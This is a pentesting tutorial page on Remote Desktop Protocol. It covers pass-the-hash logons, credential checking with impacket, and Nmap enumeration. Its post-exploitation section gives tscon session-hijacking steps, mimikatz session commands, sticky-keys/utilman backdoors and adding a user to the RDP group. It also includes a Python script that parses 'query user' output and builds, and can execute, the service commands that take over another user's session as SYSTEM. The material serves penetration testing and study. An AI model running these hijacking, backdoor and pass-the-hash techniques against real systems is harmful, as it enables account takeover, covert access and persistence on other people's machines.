3389 - Pentesting RDP

Basic Information

Remote Desktop Protocol (RDP) is a proprietary protocol developed by Microsoft that gives a user a graphical interface to another computer over a network connection. The user runs an RDP client, while the other computer must run an RDP server (the Remote Desktop Services / Terminal Services role on Windows).
Default port: 3389 (TCP; Windows 8 / Server 2012 and later also listen on UDP 3389 for the RDP UDP transport, so scan it with -sU as well)

PORT     STATE SERVICE
3389/tcp open  ms-wbt-server

Connect with known credentials/hash

rdesktop -u <username> <IP>
rdesktop -d <domain> -u <username> -p <password> <IP>
xfreerdp /u:[domain\]<username> /p:<password> /v:<IP>
xfreerdp /u:[domain\]<username> /pth:<NT hash> /v:<IP>

Pass-the-hash over RDP (/pth:) only works when the target has Restricted Admin mode enabled (HKLM\SYSTEM\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin set to 0); otherwise the server rejects the logon even with a correct hash.
Be careful: every failed RDP logon counts against the account lockout policy, so spraying credentials this way can lock accounts.

Check known credentials against RDP services

rdp_check.py from impacket lets you check whether a set of credentials (password or NTLM hash) is valid for an RDP service without opening a graphical session:

rdp_check.py <domain>/<name>:<password>@<IP>
rdp_check.py <domain>/<name>@<IP> -hashes <LM hash>:<NT hash>

It authenticates through CredSSP/NLA, so failed attempts are real logon failures and also count towards lockout.

Nmap scripts

nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 <IP>

rdp-enum-encryption enumerates the security protocols (standard RDP security, TLS, CredSSP/NLA) and encryption levels the server accepts, which tells you whether NLA is enforced; rdp-vuln-ms12-020 checks for MS12-020 without crashing the service; rdp-ntlm-info extracts the NetBIOS/DNS names, domain and OS version from the NTLM challenge the server returns during NLA.
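The negotiation that rdp-enum-encryption performs is a single X.224 Connection Request carrying an RDP_NEG_REQ, answered by an X.224 Connection Confirm carrying either RDP_NEG_RSP (the protocol the server picked) or RDP_NEG_FAILURE (why it refused). The script below is an added example, not code from the original page or from Nmap: it builds the request, decodes the reply, and reports whether NLA is enforced. Offering only standard RDP security and getting HYBRID_REQUIRED_BY_SERVER back is the NLA check. The probe() function needs network access to a real RDP server; the builder and parser run offline and the response bytes in the comments are constructed for illustration.

```python
import socket
import struct

# Security protocol flags a client may advertise in RDP_NEG_REQ (MS-RDPBCGR 2.2.1.1.1)
PROTOCOL_RDP = 0x0        # standard RDP security: legacy, no TLS, no NLA
PROTOCOL_SSL = 0x1        # TLS
PROTOCOL_HYBRID = 0x2     # CredSSP, i.e. Network Level Authentication
PROTOCOL_HYBRID_EX = 0x8  # CredSSP with early user authorization result

PROTOCOL_NAMES = {PROTOCOL_RDP: "RDP", PROTOCOL_SSL: "SSL",
                  PROTOCOL_HYBRID: "HYBRID", PROTOCOL_HYBRID_EX: "HYBRID_EX"}
FAILURE_CODES = {1: "SSL_REQUIRED_BY_SERVER", 2: "SSL_NOT_ALLOWED_BY_SERVER",
                 3: "SSL_CERT_NOT_ON_SERVER", 4: "INCONSISTENT_FLAGS",
                 5: "HYBRID_REQUIRED_BY_SERVER", 6: "SSL_WITH_USER_AUTH_REQUIRED_BY_SERVER"}
TYPE_NEG_REQ, TYPE_NEG_RSP, TYPE_NEG_FAILURE = 0x01, 0x02, 0x03


def build_connection_request(requested_protocols, cookie=None):
    """TPKT header + X.224 Connection Request TPDU + RDP_NEG_REQ (cookie is the optional mstshash username)."""
    neg_req = struct.pack("<BBHI", TYPE_NEG_REQ, 0, 8, requested_protocols)
    cookie_bytes = b"" if cookie is None else b"Cookie: mstshash=" + cookie.encode("ascii") + b"\r\n"
    # X.224 CR fixed part: CR code 0xE0, DST-REF, SRC-REF, class option; variable part follows
    body = struct.pack("<BHHB", 0xE0, 0, 0, 0) + cookie_bytes + neg_req
    x224 = struct.pack("B", len(body)) + body           # length indicator does not count itself
    return struct.pack(">BBH", 3, 0, 4 + len(x224)) + x224  # TPKT: version 3, reserved, total length


def parse_connection_confirm(data):
    """Decode the server's X.224 Connection Confirm and return what it negotiated."""
    if len(data) < 11:
        raise ValueError("response too short for TPKT + X.224 CC")
    version, _, tpkt_len = struct.unpack(">BBH", data[:4])
    if version != 3 or tpkt_len != len(data):
        raise ValueError("malformed TPKT header")
    length_indicator, code = data[4], data[5]
    if code & 0xF0 != 0xD0:
        raise ValueError("expected X.224 Connection Confirm, got code 0x%02x" % code)
    if length_indicator == 6:
        # No variable part: an old server that never negotiates and only speaks standard RDP security
        return {"type": "legacy", "selected_protocol": "RDP"}
    if len(data) < 19:
        raise ValueError("negotiation structure truncated")
    neg_type, _flags, neg_len, value = struct.unpack("<BBHI", data[11:19])
    if neg_len != 8:
        raise ValueError("unexpected negotiation structure length %d" % neg_len)
    if neg_type == TYPE_NEG_RSP:
        return {"type": "response", "selected_protocol": PROTOCOL_NAMES.get(value, hex(value))}
    if neg_type == TYPE_NEG_FAILURE:
        return {"type": "failure", "failure_code": FAILURE_CODES.get(value, hex(value))}
    raise ValueError("unknown negotiation structure type 0x%02x" % neg_type)


def nla_enforced(confirm_for_plain_rdp):
    """True when offering only standard RDP security was refused because CredSSP is mandatory."""
    return (confirm_for_plain_rdp.get("type") == "failure"
            and confirm_for_plain_rdp.get("failure_code") == "HYBRID_REQUIRED_BY_SERVER")


def probe(host, port=3389, timeout=5.0):
    """Offer each protocol on its own connection and collect the answers (needs a reachable RDP server)."""
    results = {}
    for name, proto in (("RDP", PROTOCOL_RDP), ("SSL", PROTOCOL_SSL), ("HYBRID", PROTOCOL_HYBRID)):
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(build_connection_request(proto))
            results[name] = parse_connection_confirm(sock.recv(1024))
    return results


if __name__ == "__main__":
    import sys
    answers = probe(sys.argv[1])
    for offered, outcome in answers.items():
        print(f"offered {offered:7s} -> {outcome}")
    print("NLA enforced:", nla_enforced(answers["RDP"]))
```

A server that answers the plain-RDP offer with SSL_REQUIRED_BY_SERVER has TLS on but NLA off, which is the configuration worth noting for credential checks; one that replies HYBRID_REQUIRED_BY_SERVER will not accept any client that cannot do CredSSP.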

Post-Exploitation

AutoRDPwn: https://github.com/JoelGMSec/AutoRDPwn

Launch CMD with other credentials so they are used in the network

You can launch a new cmd to which a second set of credentials is attached: locally the process keeps your current token, but every authentication this shell (and anything started from it) performs against the network uses the new credentials. runas /netonly does not validate the password when the process starts, so a wrong password only shows up when the first network access fails:

runas /netonly /user:<DOMAIN>\<NAME> "cmd.exe" #The password will be prompted

Session stealing

With administrator rights you can take over any RDP session of any other user without knowing that user's password. Windows only allows a password-less tscon when the caller is SYSTEM, so run it from a service or a SYSTEM shell (for example psexec -s); run as a plain administrator it prompts for the target user's password.
Get open sessions:

query user

Connect to the selected session, where <ID> is the ID of the session you want to take over and <SESSIONNAME> is the name of the session you are currently in (for example rdp-tcp#0 or console), which gets replaced:

tscon <ID> /dest:<SESSIONNAME>

Now you are inside the selected RDP session and have impersonated the user using only built-in Windows tools and features.
Important: when you take over an active RDP session the user who was using it is disconnected (not logged off) and will notice.
You could also obtain passwords by dumping processes, but this method is much faster and lets you interact with the user's desktop (passwords typed into Notepad and never saved to disk, other RDP sessions open to other machines, ...).
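The procedure above (query user, then tscon from a SYSTEM context) as an added example that is not part of the original page: it parses query user output, picks the session to replace and the target session, and produces the sc create / net start commands that make the Service Control Manager run tscon as LocalSystem, which is what removes the password prompt. The service name sesshijack and the sample query user output are constructed for the example; the parser handles the real-world quirk that disconnected sessions print an empty SESSIONNAME column, which breaks a naive split(). run_hijack() only works on Windows from an elevated shell; everything else runs offline.

```python
import re
import subprocess

# Constructed sample of `query user` output: ">" marks the session the command runs in,
# and the disconnected session (bob) has no SESSIONNAME, so the columns do not split evenly.
SAMPLE_QUERY_USER = """\
 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
>administrator         rdp-tcp#0           2  Active          .  1/1/2024 9:00 AM
 bob                                       3  Disc         1:05  1/1/2024 8:30 AM
 alice                 console             1  Active       none  1/1/2024 7:55 AM
"""

# The optional SESSIONNAME group plus a numeric ID anchor lets the regex realign itself
# when the column is blank; the header line never matches because its ID field is not numeric.
SESSION_LINE = re.compile(
    r"^(?P<current>>?)\s*(?P<user>\S+)\s+(?P<session>\S+)?\s+(?P<id>\d+)\s+"
    r"(?P<state>Active|Disc|Conn|Listen|Idle|Down|Init)\s+(?P<idle>\S+)\s+(?P<logon>.+?)\s*$"
)


def parse_query_user(output):
    """Turn `query user` text into a list of session dicts."""
    sessions = []
    for line in output.splitlines():
        m = SESSION_LINE.match(line)
        if not m:
            continue  # header or blank line
        sessions.append({
            "user": m["user"], "session": m["session"], "id": int(m["id"]),
            "state": m["state"], "idle": m["idle"], "logon": m["logon"],
            "current": m["current"] == ">",
        })
    return sessions


def hijack_commands(target_id, my_session, service="sesshijack"):
    """Commands to run from an elevated shell. A service created with sc runs as LocalSystem,
    so the tscon it launches needs no password; my_session is the session that gets replaced."""
    binpath = f"cmd.exe /k tscon {target_id} /dest:{my_session}"
    return [f'sc create {service} binpath= "{binpath}"',
            f"net start {service}",   # reports a start timeout, but tscon has already run
            f"sc delete {service}"]   # clean up the service afterwards


def plan_hijack(query_user_output, target_user):
    """Resolve the current session and the target user's session, then build the commands."""
    sessions = parse_query_user(query_user_output)
    mine = next((s for s in sessions if s["current"]), None)
    target = next((s for s in sessions if s["user"].lower() == target_user.lower()), None)
    if mine is None or mine["session"] is None:
        raise ValueError("could not identify the current session to replace")
    if target is None:
        raise ValueError(f"no session for user {target_user!r}")
    if target["id"] == mine["id"]:
        raise ValueError("target is the current session")
    return hijack_commands(target["id"], mine["session"])


def run_hijack(target_user):
    """Windows only: execute the plan against the live machine (requires an elevated shell)."""
    output = subprocess.run(["query", "user"], capture_output=True, text=True, check=True).stdout
    for cmd in plan_hijack(output, target_user):
        subprocess.run(cmd, shell=True, check=False)


if __name__ == "__main__":
    for cmd in plan_hijack(SAMPLE_QUERY_USER, "bob"):
        print(cmd)
```

Disconnected sessions (state Disc) are the quiet targets: taking one over does not kick anybody off, while replacing an Active session disconnects its user immediately.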

Mimikatz

You could also use mimikatz to do this:

ts::sessions #Get sessions
ts::remote /id:2 #Connect to the session

Sticky-keys & Utilman

Combining this technique with a sticky-keys or utilman backdoor (replacing C:\Windows\System32\sethc.exe or utilman.exe with cmd.exe, or registering cmd.exe as their debugger under Image File Execution Options) gives you a SYSTEM cmd from the logon screen of any RDP connection, with no credentials, from which you can run tscon against any session at any time.
You can search for RDP servers that have already been backdoored with one of these techniques with: https://github.com/linuz/Sticky-Keys-Slayer

Adding User to RDP group

net localgroup "Remote Desktop Users" UserLoginName /add

HackTricks Automatic Commands

Protocol_Name: RDP #Protocol Abbreviation if there is one.
Port_Number: 3389 #Comma separated if there is more than one.
Protocol_Description: Remote Desktop Protocol #Protocol Abbreviation Spelled out

Entry_1:
  Name: Notes
  Description: Notes for RDP
  Note: |
    Remote Desktop Protocol (RDP) is a proprietary protocol developed by Microsoft, which provides a user with a graphical interface to connect to another computer over a network connection. The user employs RDP client software for this purpose, while the other computer must run RDP server software

    https://book.hacktricks.xyz/pentesting/pentesting-rdp

Entry_2:
  Name: Nmap
  Description: Nmap with RDP Scripts
  Command: nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 {IP}